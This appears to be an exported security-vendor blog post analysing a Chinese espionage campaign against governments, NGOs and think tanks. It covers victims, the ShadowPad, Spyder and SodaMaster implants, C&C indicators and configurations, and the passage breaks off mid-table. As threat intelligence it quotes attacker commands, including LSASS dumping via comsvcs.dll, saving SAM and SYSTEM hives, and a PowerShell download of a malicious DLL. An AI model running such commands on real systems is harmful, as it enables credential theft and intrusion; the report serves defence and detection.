{"id":8731,"date":"2025-03-20T12:00:00","date_gmt":"2025-03-20T10:00:00","guid":{"rendered":"https:\/\/blog.eset.ee\/et\/?p=8731"},"modified":"2026-06-14T19:46:55","modified_gmt":"2026-06-14T16:46:55","slug":"operation-fishmedley-targeting-governments-ngos-and-think-tanks","status":"publish","type":"post","link":"https:\/\/blog.eset.ee\/et\/en\/2025\/03\/20\/operation-fishmedley-targeting-governments-ngos-and-think-tanks\/","title":{"rendered":"Operation FishMedley targeting governments, NGOs, and think tanks"},"content":{"rendered":"<p>On March 5<sup>th<\/sup>, 2025, the US DOJ unsealed an indictment against employees of the Chinese contractor I\u2011SOON for their involvement in multiple global espionage operations. Those include attacks that we previously documented and attributed to the FishMonger APT group \u2013 I\u2011SOON\u2019s operational arm \u2013 including the compromise of seven organizations that we identified as being targeted in a 2022 campaign that we named Operation FishMedley.<\/p>\n<blockquote>\n<div><strong>Key points of this blogpost:<\/strong><\/div>\n<ul>\n<li>Verticals targeted during Operation FishMedley include governments, NGOs, and think tanks, across Asia, Europe, and the United States.<\/li>\n<li>Operators used implants \u2013 such as ShadowPad, SodaMaster, and Spyder \u2013 that are common or exclusive to China-aligned threat actors.<\/li>\n<li>We assess with high confidence that Operation FishMedley was conducted by the FishMonger APT group.<\/li>\n<li>Independent of the DOJ indictment, we determined that FishMonger is operated by I\u2011SOON.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>FishMonger profile<\/h2>\n<p>FishMonger \u2013 a group believed to be operated by the Chinese contractor I\u2011SOON (see our <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2023-q1-2024.pdf\">Q4 2023-Q1 2024 APT Activity Report<\/a>) \u2013 falls under the Winnti Group umbrella and is most likely operating out of China, from the city of Chengdu where I\u2011SOON\u2019s office was <a href=\"https:\/\/substack.com\/home\/post\/p-155672015\">located<\/a>. FishMonger is also known as Earth Lusca, TAG\u201122, Aquatic Panda, or Red Dev 10. We <a href=\"https:\/\/www.welivesecurity.com\/2020\/01\/31\/winnti-group-targeting-universities-hong-kong\/\">published<\/a> an analysis of this group in early 2020 when it heavily targeted universities in Hong Kong during the civic protests that started in June 2019. We initially attributed the incident to Winnti Group but have since revised our attribution to FishMonger.<\/p>\n<p>The group is known to operate watering-hole attacks, as reported by <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/g\/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html\">Trend Micro<\/a>. FishMonger\u2019s toolset includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and the BIOPASS RAT.<\/p>\n<h2>Overview<\/h2>\n<p>On March 5<sup>th<\/sup>, 2025, the US Department of Justice published a <a href=\"https:\/\/www.justice.gov\/opa\/pr\/justice-department-charges-12-chinese-contract-hackers-and-law-enforcement-officers-global\">press release<\/a> and unsealed an <a href=\"https:\/\/www.justice.gov\/usao-sdny\/media\/1391751\/dl?inline\">indictment<\/a> against I\u2011SOON employees and officers of China\u2019s Ministry of Public Security involved in multiple espionage campaigns from 2016 to 2023. The FBI also added those named in the indictment to its <a href=\"https:\/\/www.fbi.gov\/wanted\/cyber\/aquatic-panda-cyber-threat-actors\">\u201cmost wanted\u201d list<\/a> and published a poster, as seen in Figure 1.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 1. Names of FishMonger I-SOON members\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-1.gif\" title=\"Figure 1. Names of FishMonger \/ I-SOON members (source: FBI)\" width=\"\"><figcaption><em>Figure 1. Names of FishMonger \/ I\u2011SOON members (source: FBI)<\/em><\/figcaption><\/figure>\n<p>The indictment describes several attacks that are strongly related to what we published in a <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/\">private APT intelligence report<\/a> in early 2023. In this blogpost, we share our technical knowledge about this global campaign that targeted governments, NGOs, and think tanks across Asia, Europe, and the United States. We believe that this information complements the recently published indictment.<\/p>\n<p>During 2022, we investigated several compromises where implants such as ShadowPad and SodaMaster, which are commonly employed by China-aligned threat actors, were used. We were able to cluster seven independent incidents for this blogpost and have named that campaign Operation FishMedley.<\/p>\n<h3>FishMonger and I-SOON<\/h3>\n<p>During our research, we were able to independently determine that FishMonger is an espionage team operated by I\u2011SOON, a Chinese contractor based in Chengdu that suffered an infamous document leak in 2024 \u2013 see this comprehensive analysis from <a href=\"https:\/\/harfanglab.io\/insidethelab\/isoon-leak-analysis\/\">Harfang Labs<\/a>.<\/p>\n<h3>Victimology<\/h3>\n<p>Table 1 shows details about the seven victims we identified. The verticals and countries are diverse, but most are of obvious interest to the Chinese government.<\/p>\n<p><em>Table 1. Victimology details<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"75\"><strong>Victim<\/strong>\n<\/td>\n<td width=\"161\"><strong>Date of compromise<\/strong>\n<\/td>\n<td width=\"123\"><strong>Country<\/strong>\n<\/td>\n<td width=\"262\"><strong>Vertical<\/strong>\n<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"75\"><strong>A<\/strong>\n<\/td>\n<td width=\"161\">January 2022 <\/td>\n<td width=\"123\">Taiwan <\/td>\n<td width=\"262\">Governmental organization. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>B<\/strong>\n<\/td>\n<td width=\"161\">January 2022 <\/td>\n<td width=\"123\">Hungary <\/td>\n<td width=\"262\">Catholic organization. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>C<\/strong>\n<\/td>\n<td width=\"161\">February 2022 <\/td>\n<td width=\"123\">Turkey <\/td>\n<td width=\"262\">Unknown. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>D<\/strong>\n<\/td>\n<td width=\"161\">March 2022 <\/td>\n<td width=\"123\">Thailand <\/td>\n<td width=\"262\">Governmental organization. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>E<\/strong>\n<\/td>\n<td width=\"161\">April 2022 <\/td>\n<td width=\"123\">United States <\/td>\n<td width=\"262\">Catholic charity operating worldwide. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>F<\/strong>\n<\/td>\n<td width=\"161\">June 2022 <\/td>\n<td width=\"123\">United States <\/td>\n<td width=\"262\">NGO \u2013 mainly active in Asia. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>G<\/strong>\n<\/td>\n<td width=\"161\">October 2022 <\/td>\n<td width=\"123\">France <\/td>\n<td width=\"262\">Geopolitical think tank. <\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Table 2 summarizes the implants used during each intrusion of Operation FishMedley.<\/p>\n<p><em>Table 2. Details of the implants used against each victim<\/em><\/p>\n<\/p>\n<div>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td>Victim | Tool<\/td>\n<td>ScatterBee-packed ShadowPad<\/td>\n<td>Spyder<\/td>\n<td>SodaMaster<\/td>\n<td>RPipeCommander<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"144\"><strong>A<\/strong><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\">\n<\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>B<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>C<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>D<\/strong><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>E<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>F<\/strong><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>G<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<h2>Technical analysis<\/h2>\n<h3>Initial access<\/h3>\n<p>We were unable to identify the initial compromise vectors. For most cases, the attackers seemed to have had privileged access inside the local network, such as domain administrator credentials.<\/p>\n<p>At Victim D, the attackers gained access to an admin console and used it to deploy implants on other machines in the local network. It is probable that they first compromised the machine of a sysadmin or security analyst and then stole credentials that allowed them to connect to the console.<\/p>\n<p>At Victim F, the implants were delivered using <a href=\"https:\/\/github.com\/fortra\/impacket\">Impacket<\/a>, which means that the attackers somehow previously compromised a high-privilege domain account.<\/p>\n<h3>Lateral movement<\/h3>\n<p>At Victim F, the operators also used Impacket to move laterally. They gathered information on other local machines and installed implants.<\/p>\n<p>Table 3 shows that the operators first did some manual reconnaissance using <span>quser.exe<\/span>, <span>wmic.exe<\/span>, and <span>ipconfig.exe<\/span>. Then they tried to get credentials and other secrets by <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2022\/10\/05\/detecting-and-preventing-lsass-credential-dumping-attacks\/\">dumping<\/a> the local security authority subsystem service (LSASS) process (PID 944). The PID of the process was obtained via <span>tasklist \/svc<\/span> and the dump was performed using <span>comsvcs.dll<\/span>, which is a known living-off-the-land binary (<a href=\"https:\/\/lolbas-project.github.io\/lolbas\/Libraries\/comsvcs\/\">LOLBIN<\/a>). Note that it is likely that the attackers executed <span>quser.exe<\/span> to see whether other users or admins were also logged in, meaning privileged accesses were present in LSASS. According to <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/quser\">Microsoft documentation<\/a>, to use this command the attacker must have Full Control permission or special access permission.<\/p>\n<p>They also saved the registry hives <span>sam.hive<\/span> and <span>system.hive<\/span>, which can both contain secrets or credentials.<\/p>\n<p>Finally, they tried to dump the LSASS process again, using a <span>for<\/span> loop iterating over the output from <span>tasklist.exe<\/span>. We have seen this same code used on other machines, so it is a good idea to block or at least alert on it.<\/p>\n<p><em>Table 3. Commands executed via Impacket on a machine at Victim F<\/em><\/p>\n<h3><span><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"141\"><strong>Timestamp (UTC)<\/strong><\/td>\n<td width=\"501\"><strong>Command<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"141\">2022-06-21 07:34:07<\/td>\n<td width=\"501\"><span>quser<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>wmic os get lastbootuptime<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>ipconfig \/all<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>tasklist \/svc<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -c &#8220;C:WindowsSystem32rundll32 C:windowssystem32comsvcs.dll, MiniDump 944 c:userspublicmusictemp.tmp full&#8221;<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>reg save hklmsam C:userspublicmusicsam.hive<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>reg save hklmsystem C:userspublicmusicsystem.hive<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>net user<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-22 07:05:37<\/td>\n<td width=\"501\"><span>tasklist \/v<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-22 07:07:33<\/td>\n<td width=\"501\"><span>dir c:users<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-22 09:47:52<\/td>\n<td width=\"501\"><span>for \/f &#8220;tokens=1,2 delims= &#8221; ^%A in (&#8216;&#8221;tasklist \/fi &#8220;Imagename eq lsass.exe&#8221; | find &#8220;lsass&#8221;&#8221;&#8216;) do rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump ^%B WindowsTempYDWS6P.xml full<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/span><\/h3>\n<h3>Toolset<\/h3>\n<h4>ShadowPad<\/h4>\n<p>ShadowPad is a well-known and privately sold modular backdoor, known to only be supplied to China-aligned APT groups, including <a href=\"https:\/\/www.welivesecurity.com\/2020\/01\/31\/winnti-group-targeting-universities-hong-kong\/\">FishMonger<\/a> and <a href=\"https:\/\/www.welivesecurity.com\/2021\/08\/24\/sidewalk-may-be-as-dangerous-as-crosswalk\/\">SparklingGoblin<\/a>, as documented by <a href=\"https:\/\/assets.sentinelone.com\/c\/Shadowpad?x=P42eqA#page=1\">SentinelOne<\/a>. In Operation FishMedley, the attackers used a ShadowPad version packed with <a href=\"https:\/\/www.pwc.co.uk\/issues\/cyber-security-services\/research\/chasing-shadows.html\">ScatterBee<\/a>.<\/p>\n<p>At Victim D, the loader was downloaded using the following PowerShell command:<\/p>\n<p><span>powershell (new-object System.Net.WebClient).DownloadFile(&#8220;http:\/\/&lt;victim\u2019s_web_server_IP_address&gt;\/Images\/menu\/log.dll&#8221;;&#8221;c:userspubliclog.dll&#8221;)<\/span><\/p>\n<p>This shows that the attackers compromised a web server at the victim\u2019s organization to use it as a staging server for their malware.<\/p>\n<p>At Victim F, Firefox was used to download the loader, from <span>http:\/\/5.188.230[.]47\/log.dll<\/span>. We don\u2019t know whether attackers had interactive access to the machine, whether another piece of malware was running in the Firefox process, or whether the victim was redirected to the download page, say via a watering-hole attack.<\/p>\n<p><span>log.dll<\/span> is side-loaded by an old Bitdefender executable (original name: <span>BDReinit.exe<\/span>) and loads ShadowPad from a file named <span>log.dll.dat<\/span>, which can be decrypted using the scripts provided in PwC\u2019s <a href=\"https:\/\/github.com\/PwCUK-CTO\/ScatterBee_Analysis\">GitHub<\/a> repository.<\/p>\n<p>We did not recover the <span>log.dll.dat<\/span> from the victim\u2019s machine, but we found a fake Adobe Flash installer on <a href=\"https:\/\/www.virustotal.com\/gui\/file\/9447B75AF497E5A7F99F1DED1C1D87C53B5B59FCE224A325932AD55EEF9E0E4A\">VirusTotal<\/a> with the identical <span>log.dll<\/span> file. The configuration of the ShadowPad payload is provided in Table 4.<\/p>\n<p><em>Table 4. ShadowPad configuration<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"198\"><strong>Field<\/strong><\/td>\n<td width=\"444\"><strong>Decrypted value<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"198\"><strong>Timestamp<\/strong><\/td>\n<td width=\"444\"><span>3\/14\/2022 10:52:16 PM<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Campaign code<\/strong><\/td>\n<td width=\"444\"><span>2203<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>File path<\/strong><\/td>\n<td width=\"444\"><span>%ALLUSERSPROFILE%DRMTest<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Spoofed name<\/strong><\/td>\n<td width=\"444\"><span>Test.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Loader filename<\/strong><\/td>\n<td width=\"444\"><span>log.dll<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Payload filename<\/strong><\/td>\n<td width=\"444\"><span>log.dll.dat<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Service name<\/strong><\/td>\n<td width=\"444\"><span>MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative service name<\/strong><\/td>\n<td width=\"444\"><span>MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative service name<\/strong><\/td>\n<td width=\"444\"><span>MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Registry key path<\/strong><\/td>\n<td width=\"444\"><span>SOFTWAREMicrosoftWindowsCurrentVersionRun<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Service description<\/strong><\/td>\n<td width=\"444\"><span>MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Program to inject into<\/strong><\/td>\n<td width=\"444\"><span>%ProgramFiles%Windows Media Playerwmplayer.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative injection target<\/strong><\/td>\n<td width=\"444\"><span>N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative injection target<\/strong><\/td>\n<td width=\"444\"><span>N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative injection target<\/strong><\/td>\n<td width=\"444\"><span>%windir%system32svchost.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span>TCP:\/\/api.googleauthenticatoronline[.]com:443<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span>UDP:\/\/api.googleauthenticatoronline[.]com:443<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span>N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span>N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy info string<\/strong><\/td>\n<td width=\"444\"><span>SOCKS4nnnnn<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy info string<\/strong><\/td>\n<td width=\"444\"><span>SOCKS4nnnnn<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy info string<\/strong><\/td>\n<td width=\"444\"><span>SOCKS5nnnnn<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy info string<\/strong><\/td>\n<td width=\"444\"><span>SOCKS5nnnnn<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Note that from March 20<sup>th<\/sup>, 2022 to November 2<sup>nd<\/sup>, 2022, the C&amp;C domain resolved to <span>213.59.118[.]124<\/span>, which is mentioned in a VMware <a href=\"https:\/\/blogs.vmware.com\/security\/2022\/10\/threat-analysis-active-c2-discovery-using-protocol-emulation-part3-shadowpad.html\">blogpost<\/a> about ShadowPad.<\/p>\n<h4>Spyder<\/h4>\n<p>At Victim D, we detected another backdoor typically used by FishMonger: Spyder, a modular implant that was analyzed in great detail by <a href=\"https:\/\/st.drweb.com\/static\/new-www\/news\/2021\/march\/BackDoor.Spyder.1_en.pdf\">Dr.Web<\/a>.<\/p>\n<p>A Spyder loader was downloaded from <span>http:\/\/&lt;a_victim\u2019s_web_server_IP_address&gt;\/Images\/menu\/aa.doc<\/span> and dropped to <span>C:UsersPublictask.exe<\/span> around 18 hours after ShadowPad was installed.<\/p>\n<p>The loader \u2013 see Figure 2; reads the file <span>c:windowstempguid.dat<\/span> and decrypts its contents using AES-CBC. The encryption key is hardcoded: <span>F4 E4 C6 9E DE E0 9E 82 00 00 00 00 00 00 00 00<\/span>. The initialization vector (IV) is the first eight bytes of the key. Unfortunately, we were unable to recover the <span>guid.dat<\/span> file.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 2. Spyder loader\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-2.png\" title=\"Figure 2. Spyder loader\" width=\"\"><figcaption><em>Figure 2. Spyder loader<\/em><\/figcaption><\/figure>\n<p>Then, the loader injects the decoded content \u2013 likely shellcode \u2013 into itself (<span>task.exe<\/span> process) as seen in Figure 3.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 3. Spyder loader \u2013 injection part\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-3.png\" title=\"Figure 3. Spyder loader \u2013 injection part\" width=\"\"><figcaption><em>Figure 3. Spyder loader \u2013 injection part<\/em><\/figcaption><\/figure>\n<p>Despite not obtaining the encrypted final payload, our product did detect a Spyder payload in memory and it was almost identical to the Spyder variant documented by Dr.Web. The C&amp;C server was hardcoded to <span>61.238.103[.]165<\/span>.<\/p>\n<p>Interestingly, multiple subdomains of <span>junlper[.]com<\/span>, a known Spyder C&amp;C domain and a weak homoglyph domain to <span>juniper.net<\/span>, resolved to <span>61.238.103[.]165<\/span> in 2022.<\/p>\n<p>A self-signed TLS certificate was present on port 443 of the server from May to December 2022, with the thumbprint <span>89EDCFFC66EDA3AEB75E140816702F9AC73A75F0<\/span>. According to <a href=\"https:\/\/github.com\/SentineLabs\/Shadowpad\/blob\/main\/technical-indicators\">SentinelOne<\/a>, it is a certificate used by FishMonger for its C&amp;C servers.<\/p>\n<h4>SodaMaster<\/h4>\n<p>SodaMaster is a backdoor that was documented by <a href=\"https:\/\/securelist.com\/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign\/101519\/\">Kaspersky<\/a> in 2021. APT10 was the first group known to have access to this backdoor but Operation FishMedley indicates that it may now be shared among multiple China-aligned APT groups.<\/p>\n<p>SodaMaster can only be found decrypted in memory and that\u2019s where we detected it. Even though we did not recover the full loading chain, we have identified a few samples that are the first step of the chain.<\/p>\n<h5>SodaMaster loaders<\/h5>\n<p>We found six different malicious DLLs that are abusing legitimate executables via <a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1574\/002\/\">DLL side-loading<\/a>. They all implement the same decryption and injection routine.<\/p>\n<p>First, the loader reads a hardcoded file, for example <span>debug.png<\/span>, and XOR decrypts it using a hardcoded 239-byte key. Table 5 summarizes the different loaders. Note that the XOR key is also different in each sample, but too long to be included in the table. Also note that we did not recover any of these encrypted payloads.<\/p>\n<p><em>Table 5. SodaMaster loaders<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"170\"><strong>DLL name<\/strong><\/td>\n<td width=\"293\"><strong>Payload filename<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span>3C08C694C222E7346BD8<wbr><\/wbr>633461C5D19EAE18B661<\/span><\/td>\n<td width=\"170\"><span>DrsSDK.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;debug.png<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>D8B631C551845F892EBB<wbr><\/wbr>5E7D09991F6C9D4FACAD<\/span><\/td>\n<td width=\"170\"><span>libvlc.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;vlc.cnf<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3A702704653EC847CF91<wbr><\/wbr>21E3F454F3DBE1F90AFD<\/span><\/td>\n<td width=\"170\"><span>safestore64.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;Location<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3630F62771360540B667<wbr><\/wbr>01ABC8F6C868087A6918<\/span><\/td>\n<td width=\"170\"><span>DeElevator64.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;Location<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A4F68D0F1C72C3AC9D70<wbr><\/wbr>919C17DC52692C43599E<\/span><\/td>\n<td width=\"170\"><span>libmaxminddb-0.dll<\/span><\/td>\n<td width=\"293\"><span>C:windowssystem32<wbr><\/wbr>MsKeyboardFilterapi.dll<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>5401E3EF903AFE981CFC<wbr><\/wbr>2840D5F0EF2F1D83B0BF<\/span><\/td>\n<td width=\"170\"><span>safestore641.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;Location<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Then, the decrypted buffer is injected into a newly created, suspended <span>svchost.exe<\/span> process \u2013 see Figure 4.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 4. SodaMaster injection\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-4.png\" title=\"Figure 4. SodaMaster injection\" width=\"\"><figcaption><em>Figure 4. SodaMaster injection<\/em><\/figcaption><\/figure>\n<p>Finally, the shellcode is executed using either <span>CreateRemoteThread<\/span> (on Windows XP or older versions) or, on newer Windows versions, via <span>NtCreateThreadEx<\/span> as shown in Figure 5.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 5. Execution of the injected payload\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-5.png\" title=\"Figure 5. Execution of the injected payload\" width=\"\"><figcaption><em>Figure 5. Execution of the injected payload<\/em><\/figcaption><\/figure>\n<p>The last four loaders in Table 5 have additional features:<\/p>\n<ul>\n<li>They have an export named <span>getAllAuthData<\/span> that implements a password stealer for Firefox. It reads the Firefox SQLite database and runs the query <span>SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins<\/span>.<\/li>\n<li>The last three loaders persist as a service named <span>Netlock<\/span>, <span>MsKeyboardFiltersrv<\/span>, and <span>downmap<\/span>, respectively.<\/li>\n<\/ul>\n<h5>SodaMaster payload<\/h5>\n<p>As mentioned above, the SodaMaster payload was publicly analyzed by Kaspersky and the samples we\u2019ve found don\u2019t seem to have evolved much. They still implement the same four backdoor commands (<span>d<\/span>, <span>f<\/span>, <span>l<\/span>, and <span>s<\/span>) that were present in 2021.<\/p>\n<p>Table 6 shows the configurations from the four different SodaMaster payloads that we identified. Operators used a different C&amp;C server per victim, but we can see that Victims B and C share the same hardcoded RSA key.<\/p>\n<p><em>Table 6. SodaMaster configuration<\/em><\/p>\n<h4><span><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"56\"><strong>Victim<\/strong><\/td>\n<td width=\"142\"><strong>C&amp;C server<\/strong><\/td>\n<td width=\"438\"><strong>RSA key<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"56\"><strong>B<\/strong><\/td>\n<td width=\"142\"><span>162.33.178[.]23<\/span><\/td>\n<td width=\"438\"><span>MIGJAoGBAOPjO7DslhZvp0t8HNU\/NWPIwstzwi61JlevD6TJtv\/TZuN6Cg<wbr><\/wbr>XMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDV<wbr><\/wbr>DPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeV<wbr><\/wbr>ZoKjcxAgMBAAE=<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"56\"><strong>C<\/strong><\/td>\n<td width=\"142\"><span>78.141.202[.]70<\/span><\/td>\n<td width=\"438\"><span>MIGJAoGBAOPjO7DslhZvp0t8HNU\/NWPIwstzwi61JlevD6TJtv\/TZuN6Cg<wbr><\/wbr>XMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDV<wbr><\/wbr>DPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeV<wbr><\/wbr>ZoKjcxAgMBAAE=<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"56\"><strong>F<\/strong><\/td>\n<td width=\"142\"><span>192.46.223[.]211<\/span><\/td>\n<td width=\"438\"><span>MIGJAoGBAMYOg+eoTREKaAESDXt3Uh3Y4J84ObD1dfl3dOji0G24UlbHdj<wbr><\/wbr>Uk3e+\/dtHjPsRZOfdLkwtz8SIZZVVt3pJGxgx9oyRtckJ6zsrYm\/JIK+7b<wbr><\/wbr>XikGf7sgs5zCItcaNJ1HFKoA9YQpfxXrwoHMCkaGb9NhsdsQ2k2q4jT68H<wbr><\/wbr>ygzq19AgMBAAE=<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"56\"><strong>G<\/strong><\/td>\n<td width=\"142\"><span>168.100.10[.]136<\/span><\/td>\n<td 